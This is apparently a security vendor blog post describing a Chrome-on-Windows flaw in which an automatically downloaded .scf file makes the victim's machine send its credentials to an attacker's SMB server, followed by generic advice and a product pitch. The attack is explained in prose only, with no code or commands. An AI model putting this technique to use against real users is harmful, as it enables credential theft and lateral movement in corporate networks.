The rise of Chrome usage in companies is indisputable. Despite the fact that, as has been indicated by Gartner analyst David Michal Smith, “Microsoft retains a very strong relationship” with IT departments at enterprises, Chrome is the “most-used browser” at businesses. According to data from the consultant Net Applications, Chrome’s market share is 59%, while the combined market share of Microsoft’s two browsers, Edge and Internet Explorer, is only 24%.
Despite the increasing popularity of Google Chrome, its use in Windows may pose serious risks to businesses: a browser security hole that enables credential-theft to access the Microsoft operating system.
The Problem: Automatic Downloads
The process of exploiting this vulnerability, discovered by Bosko Stankovic, security researcher at Defense Code, is quite simple. The attack combines two techniques (one extracted from the Stuxnet campaign and another from a method presented at the Black Hat 2015 conference) to perform SMB (Server Message Block) transmission attacks.
By default, Chrome automatically downloads the files it considers secure. However, for a malicious file to fulfill its function, the user subsequently has to open or execute it. Therefore, when in doubt, you can delete the downloaded file and will not suffer any attacks.
The problem with the Chrome security breach in question is that it allows a hacker to download and execute a malicious file in our browser without user authorization.
The operation is as follows. The attacker tricks the user into clicking a link that downloads a .scf file, which acts as a quick access to display the desktop in Windows. That file remains inactive until the user opens the download folder, but as soon as the folder is opened, the file runs automatically and looks for an icon associated with the .scf file. Then, a connection is generated with the attacker’s server and, in order to find the icon, the user’s computer shows its credentials to the server. In other words, the attacker will have your username and password handed to them on a platter.
On a large scale, the importance of this attack is that it also jeopardizes the security of companies, since after accessing a single workstation, the attacker can reuse the credentials to direct their attack at other computers in the corporate network, putting company data and the business’s main assets in danger.
How can you avoid this threat?
Google is aware of this security hole in its browser, but has not yet published a solution. In the meantime, we should keep in mind that clicking on links in untrusted emails and messages, or downoading files from unknown sources, is usually a pretty bad idea.
The professional security tools developed by Panda Security are a guarantee against this type of attacks. Since advanced malware takes advantage of the fact that antivirus solutions have no previous knowledge of its signature, a protection model that is able to detect unknown threats is essential. That’s why the advanced protection of Adaptive Defense, through the monitoring and continuous classification model that it pioneered, proves to be the weapon companies need to counteract such attacks.